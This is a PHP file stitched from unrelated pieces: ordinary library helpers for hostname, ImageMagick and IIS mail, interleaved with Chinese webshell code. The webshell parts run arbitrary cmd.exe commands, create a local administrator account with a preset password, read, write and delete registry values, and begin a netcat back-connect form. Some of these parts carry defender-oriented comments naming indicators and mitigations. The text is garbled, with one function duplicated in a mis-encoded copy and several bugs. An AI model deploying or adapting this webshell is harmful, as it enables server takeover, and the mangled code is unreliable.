$adminmail = isset($_SERVER['SERVER_ADMIN']) ? "<a href=\"mailto:" . $_SERVER['SERVER_ADMIN'] . "\">" . $_SERVER['SERVER_ADMIN'] . "</a>" : "<a href=\"mailto:" . get_cfg_var("sendmail_from") . "\">" . get_cfg_var("sendmail_from") . "</a>"; if ($dis_func == "") { $dis_func = "No"; } else { $dis_func = str_replace(" ", "<br>", $dis_func); $dis_func = str_replace(",", "<br>", $dis_func); } $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No"; $info = array(array("服务器时间", date("Y年m月d日 h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", $_SERVER["REMOTE_ADDR"]), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("服务器管理员", $adminmail), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 
'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen"))); $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); echo '<table width="100%" border="0">'; for ($i = 0; $i < count($info); $i++) { echo '<tr><td width="40%">' . $info[$i][0] . '</td><td>' . $info[$i][1] . '</td></tr>' . "\n"; } try { $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); } catch (Exception $e) { } echo '<tr><td width="40%">Terminal Service端口为</td><td>' . $registry_proxystring . '</td></tr>' . "\n"; echo '<tr><td width="40%">Telnet端口为</td><td>' . $Telnet . '</td></tr>' . "\n"; echo '<tr><td width="40%">PcAnywhere端口为</td><td>' . $PcAnywhere . '</td></tr>' . "\n"; echo '</table>'; break; case "nc": $M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"]; $B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019'; print <<<END <form method="POST"> <div class="actall">使用方法:<br>
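/**
 * Returns the fully-qualified domain name of the server
 *
 * The value is resolved once and cached in self::$fqdn. Sources are tried in
 * order: the HOST and HOSTNAME environment variables, php_uname('n'), and,
 * when the result still has no domain part, `hostname --fqdn` on Linux, the
 * TCP/IP registry keys on Windows, or the `domain` line of /etc/resolv.conf.
 * Environment, registry and resolv.conf values are taken as-is (no
 * validation), so the result is informational and should not by itself
 * drive a security decision.
 *
 * @internal
 *
 * @return string The fully-qualified domain name of the server
 */
public static function getFQDN()
{
    if (self::$fqdn !== NULL) {
        return self::$fqdn;
    }

    if (isset($_ENV['HOST'])) {
        self::$fqdn = $_ENV['HOST'];
    }
    if (strpos((string) self::$fqdn, '.') === FALSE && isset($_ENV['HOSTNAME'])) {
        self::$fqdn = $_ENV['HOSTNAME'];
    }
    if (strpos((string) self::$fqdn, '.') === FALSE) {
        self::$fqdn = php_uname('n');
    }

    if (strpos((string) self::$fqdn, '.') === FALSE) {
        if (fCore::checkOS('linux') && self::canShellExec()) {
            // Fixed command string; nothing request-controlled is interpolated.
            // Keep the short host name if the command produced no output.
            $hostname = shell_exec('hostname --fqdn');
            if (is_string($hostname) && trim($hostname) !== '') {
                self::$fqdn = trim($hostname);
            }
        } elseif (fCore::checkOS('windows')) {
            $domain = self::readWindowsDnsDomain();
            if ($domain !== '') {
                // Append to the short host name; a plain assignment here would
                // drop the host part and yield ".domain" instead of an FQDN.
                self::$fqdn .= '.' . $domain;
            }
        } elseif (!ini_get('open_basedir') && file_exists('/etc/resolv.conf')) {
            $output = file_get_contents('/etc/resolv.conf');
            if ($output !== FALSE && preg_match('#^domain ([a-z0-9_.-]+)#im', $output, $match)) {
                self::$fqdn .= '.' . $match[1];
            }
        }
    }

    return self::$fqdn;
}


/**
 * Checks whether shell_exec() can be called in this PHP configuration
 *
 * Looks for the function actually used (shell_exec, not exec) in
 * disable_functions, and honours the legacy safe_mode switch.
 *
 * @return boolean If shell_exec() is available
 */
private static function canShellExec()
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return function_exists('shell_exec')
        && !in_array('shell_exec', $disabled, TRUE)
        && !ini_get('safe_mode');
}


/**
 * Reads the DNS domain suffix from the Windows TCP/IP registry keys
 *
 * The machine-wide NV Domain and DhcpDomain values are tried first, then the
 * Domain / DhcpDomain value of each adapter listed under Linkage\Route. A
 * RegRead of a missing value raises a com_exception, which is treated as
 * "not set here" and the next candidate is tried.
 *
 * @return string The domain suffix, or '' if none is found or WScript.Shell is unavailable
 */
private static function readWindowsDnsDomain()
{
    $tcpip_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip';

    try {
        $shell = new COM('WScript.Shell');
    } catch (com_exception $e) {
        // Windows Script Host not registered or COM disabled: no registry access
        return '';
    }

    $candidates = array(
        $tcpip_key . '\\Parameters\\NV Domain',
        $tcpip_key . '\\Parameters\\DhcpDomain'
    );
    foreach ($candidates as $key) {
        try {
            $domain = (string) $shell->RegRead($key);
            if ($domain !== '') {
                return $domain;
            }
        } catch (com_exception $e) {
            // value not present, try the next one
        }
    }

    try {
        $adapters = $shell->RegRead($tcpip_key . '\\Linkage\\Route');
    } catch (com_exception $e) {
        return '';
    }
    foreach ($adapters as $adapter) {
        $adapter = (string) $adapter;
        // Only GUID-named entries refer to adapter interfaces
        if (!isset($adapter[0]) || $adapter[0] != '{') {
            continue;
        }
        foreach (array('Domain', 'DhcpDomain') as $value) {
            try {
                $domain = (string) $shell->RegRead($tcpip_key . '\\Interfaces\\' . $adapter . '\\' . $value);
                if ($domain !== '') {
                    return $domain;
                }
            } catch (com_exception $e) {
                // value not present for this adapter
            }
        }
    }

    return '';
}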
/**
 * Webshell control panel (Windows targets). Selected by $_GET['winshell'] and
 * driven entirely by untrusted POST input; there is no authorisation check
 * inside this function. The three views are: running a command line through
 * the WScript.Shell COM object, creating a local account through the
 * Shell.Users COM object, and reading a registry value through
 * WScript.Shell::RegRead. This is attacker tooling, not application code;
 * its value to a defender is as a recognisable pattern.
 *
 * Indicators grounded in this code: PHP instantiating COM("Wscript.Shell")
 * or COM("Shell.Users"); the PHP worker process spawning "cmd.exe /c ...";
 * requests carrying s=jk&winshell=... with parameters wcmd/wcpth, wuser/wpasw
 * or regpath. Mitigation: do not load the com_dotnet extension on web-facing
 * PHP, run the worker without local administrator rights, and treat a file
 * containing this function as a compromise indicator.
 *
 * The user-facing strings in this copy are mis-encoded (shown as replacement
 * characters); they are runtime output and are left untouched here.
 */
function winshell()
{
    $nop = ' ';
    if ($_GET['winshell'] == 'wscript') {
        // Interpreter path and command line come verbatim from POST
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;">
<input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // "<interpreter> /c <command>" executed via WScript.Shell — the main
            // process-creation telemetry point (php worker -> cmd.exe)
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        // Account name and password come verbatim from POST
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            // Local account creation through the Shell.Users COM object —
            // shows up as account-management events attributed to the web worker
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Registry path comes verbatim from POST; default is the RDP port value
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // Arbitrary registry read via WScript.Shell::RegRead
            $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '����: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        // Menu listing the three views above
        $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
WscriptΪ����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
    }
}
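/**
 * Returns the installed ImageMagick version string (e.g. "6.9.10").
 *
 * On Windows the installer records the version in the registry, which is
 * read first through the WScript.Shell COM object when the COM extension is
 * loaded. If that is unavailable or fails, the convert binary is executed
 * with `-version` and the first output line is parsed. The result is cached
 * in a static for the lifetime of the process.
 *
 * @return string
 * @throws ImageMagickException if convert cannot be run or its output carries no version
 */
public function getImageMagickVersion()
{
    static $version = null;

    if (!$version && $this->isWindows() && class_exists('COM', false)) {
        // IM stores this in the registry if you use the installer.
        // A missing key or an unregistered WScript.Shell raises com_exception;
        // fall through to the exec() probe instead of failing the whole call.
        try {
            $shell = new \COM('WScript.Shell');
            $version = (string) $shell->RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\ImageMagick\\Current\\Version');
        } catch (\com_exception $e) {
            $version = null;
        }
    }

    if (!$version) {
        // Old-fashioned way. The convert path comes from configuration, not
        // from the request; it is not shell-escaped here, so it must stay trusted.
        exec($this->getImageMagickConvert() . ' -version', $output, $status);
        if ($status || empty($output)) {
            throw new ImageMagickException('ImageMagick was not found.');
        }
        // Guard the match: an unexpected banner would otherwise read an undefined offset
        if (!preg_match('/Version: ImageMagick (\\d+\\.\\d+\\.\\d+)/', $output[0], $matches)) {
            throw new ImageMagickException('Unable to parse the ImageMagick version from: ' . $output[0]);
        }
        $version = $matches[1];
    }

    return $version;
}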
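/**
 * Prepares the IIS SMTP pickup directory and opens a new pickup message file.
 *
 * If no mailroot directory was configured, it is derived from the IIS
 * PathWWWRoot registry value (read through WScript.Shell when the COM
 * extension is loaded) by probing <wwwroot>\..\mailroot and
 * <wwwroot>\mailroot for a Pickup sub-directory. On success
 * $this->pickup_file_name and $this->pickup_file are set.
 *
 * @return string "" on success, otherwise the error string produced by OutputError()/OutputPHPError()
 */
function StartSendingMessage()
{
    if (strlen($this->mailroot_directory) == 0) {
        $this->mailroot_directory = $this->DetectMailrootDirectory();
    }
    if (strlen($this->mailroot_directory) == 0) {
        return $this->OutputError("it was not specified the mailroot directory path");
    }
    if (!is_dir($this->mailroot_directory . "\\Pickup")) {
        return $this->OutputError("the specified mailroot path " . $this->mailroot_directory . " does not contain a Pickup directory");
    }

    // TMP may be unset for the web worker; fall back to the system temp dir
    // rather than handing tempnam() an empty/false directory.
    $tmp = getenv("TMP");
    if ($tmp === false || $tmp === "") {
        $tmp = sys_get_temp_dir();
    }
    $this->pickup_file_name = tempnam($tmp, "eml");
    if ($this->pickup_file_name === false) {
        return $this->OutputError("could not create a temporary pickup message file in " . $tmp);
    }
    if (!($this->pickup_file = @fopen($this->pickup_file_name, "w"))) {
        // $php_errormsg (track_errors) no longer exists; error_get_last() still
        // records the suppressed fopen() warning.
        $error = error_get_last();
        $message = is_array($error) ? $error["message"] : "";
        return $this->OutputPHPError("could not create a pickup message file " . $this->pickup_file_name, $message);
    }
    return "";
}

/**
 * Tries to locate the IIS mailroot directory from the registry.
 *
 * @return string A mailroot path that contains a Pickup directory, or "" if it cannot be determined
 */
function DetectMailrootDirectory()
{
    if (!class_exists("COM")) {
        return "";
    }
    try {
        $shell = new COM("WScript.Shell");
        $wwwroot = (string) $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\InetStp\\PathWWWRoot");
    } catch (Exception $e) {
        // WScript.Shell unavailable or the IIS key is absent: caller reports the missing path
        return "";
    }
    if (!is_dir($wwwroot)) {
        return "";
    }
    foreach (array($wwwroot . "\\..\\mailroot", $wwwroot . "\\mailroot") as $mailroot) {
        if (is_dir($mailroot . "\\Pickup")) {
            return $mailroot;
        }
    }
    return "";
}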
/**
 * Webshell registry panel. Reads, writes and deletes registry values whose
 * paths, types and data are taken verbatim from untrusted POST input, through
 * the WScript.Shell COM object (RegRead / RegWrite / RegDelete). There is no
 * authorisation check inside this function. This is attacker tooling; its
 * value to a defender is as a recognisable pattern.
 *
 * Indicators grounded in this code: PHP instantiating COM("wscript.shell");
 * registry modifications attributed to the web worker account; requests
 * carrying the parameters action (read/write/del), rpath, wpath/wtype/wvalue
 * or dpath. Mitigation: do not load the com_dotnet extension on web-facing
 * PHP, run the worker without local administrator rights, and treat a file
 * containing this function as a compromise indicator.
 */
function phpreg()
{
    // Fails the request outright when Windows Script Host is not registered
    $shell1 = new COM("wscript.shell") or die("require windows host");
    $action = isset($_POST['action']) ? $_POST['action'] : '';
    echo '<div class="actall"><h5>Windows注册表读写</h5></div>';
    print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
路径:<input type="hidden" name="action" value="读取">
<input type="text" name="rpath" value="{$rpath}" size="70">
<input class="bt" type="submit" value="读取"></form><br></TD></TR></div>
END;
    // Read: arbitrary registry value named by POST
    $rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
    $rpath = str_replace("\\\\", "\\", $rpath);
    if ($action == "read") {
        $out = $shell1->RegRead($rpath);
        echo '<pre>' . var_dump($out) . '</pre>';
    }
    print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>位置:<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br>
类型:<input type="text" name="wtype" value="{$wtype}" size="20">
值:<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="write"><input class="bt" type="submit" value="写入"></form></TD></TR></div>
END;
    // Write: path, value and REG_* type string all come from POST
    $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
    $wpath = str_replace("\\\\", "\\", $wpath);
    $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
    $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
    if ($action == "write") {
        $shell1->RegWrite($wpath, $wvalue, $wtype);
    }
    print <<<END
<TR><form action="" method="post">
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>
位置:<input type="hidden" name="action" value="del">
<input type="text" name="dpath" value="{$dpath}" size="70">
<input class="bt" type="submit" value="删"></form></TD></TR></div>
END;
    // Delete: arbitrary registry value or key named by POST
    $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
    $dpath = str_replace("\\\\", "\\", $dpath);
    if ($action == "del") {
        $out = $shell1->RegDelete($dpath);
    }
}
/**
 * Webshell control panel (Windows targets). Selected by $_GET['winshell'] and
 * driven entirely by untrusted POST input; there is no authorisation check
 * inside this function. The three views are: running a command line through
 * the WScript.Shell COM object, creating a local account through the
 * Shell.Users COM object, and reading a registry value through
 * WScript.Shell::RegRead. This is attacker tooling, not application code;
 * its value to a defender is as a recognisable pattern.
 *
 * Indicators grounded in this code: PHP instantiating COM("Wscript.Shell")
 * or COM("Shell.Users"); the PHP worker process spawning "cmd.exe /c ...";
 * requests carrying s=jk&winshell=... with parameters wcmd/wcpth, wuser/wpasw
 * or regpath. Mitigation: do not load the com_dotnet extension on web-facing
 * PHP, run the worker without local administrator rights, and treat a file
 * containing this function as a compromise indicator.
 */
function winshell()
{
    $nop = ' ';
    if ($_GET['winshell'] == 'wscript') {
        // Interpreter path and command line come verbatim from POST
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;">
<input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // "<interpreter> /c <command>" executed via WScript.Shell — the main
            // process-creation telemetry point (php worker -> cmd.exe)
            $ww = $wcpth . " /c " . $wcmd;
            $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        // Account name and password come verbatim from POST
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] = 'do') {
            // Local account creation through the Shell.Users COM object —
            // shows up as account-management events attributed to the web worker
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Registry path comes verbatim from POST; default is the RDP port value
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // Arbitrary registry read via WScript.Shell::RegRead
            $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '内容: ' . $e->getMessage();
            }
            echo $registry_proxystring;
        }
    } else {
        // Menu listing the three views above
        $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
    }
}